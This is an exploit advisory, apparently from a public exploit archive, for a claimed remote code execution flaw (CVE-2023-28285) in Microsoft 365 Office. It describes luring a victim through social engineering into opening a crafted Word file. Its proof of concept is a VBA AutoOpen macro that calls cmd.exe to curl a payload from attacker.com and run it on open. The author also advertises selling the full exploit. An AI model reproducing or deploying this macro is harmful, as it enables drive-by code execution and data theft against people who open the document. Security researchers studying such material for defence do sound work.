Microsoft 365 MSO 2305 Build 16.0.16501.20074 Remote Code Execution

## Title: Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074)64-bit Remote Code Execution Vulnerability## Author: nu11secur1ty## Date: 04.17.2023## Vendor: https://www.microsoft.com/## Software: https://www.microsoft.com/en-us/microsoft-365/## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/## CVE-2023-28285## Description:The attack itself is carried out locally by a user with authenticationto the targeted system. An attacker could exploit the vulnerability byconvincing a victim, through social engineering, to download and opena specially crafted file from a website which could lead to a localattack on the victim's computer. The attacker can trick the victim toopen a malicious web page by using a malicious `Word` file for`Office-365 API`. After the user will open the file to read it, fromthe API of Office-365, without being asked what it wants to activate,etc, he will activate the code of the malicious server, which he willinject himself, from this malicious server. Emedietly after thisclick, the attacker can receive very sensitive information! For bankaccounts, logs from some sniff attacks, tracking of all the traffic ofthe victim without stopping, and more malicious stuff, it depends onthe scenario and etc.STATUS: HIGH Vulnerability[+]Exploit:The exploit server must be BROADCASTING at the moment when the victimhit the button of the exploit![+]PoC:```cmdSub AutoOpen()    Call Shell("cmd.exe /S /c" & "curl -shttp://attacker.com/CVE-2023-28285/PoC.debelui | debelui",vbNormalFocus)End Sub```## FYI:The PoC has a price and this report will be uploaded with adescription and video of how you can reproduce it only.## Reproduce:[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28285)## Proof and Exploit[href](https://www.nu11secur1ty.com/2023/04/cve-2023-28285-microsoft-office-remote.html)## Time spend:01:30:00-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ andhttps://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>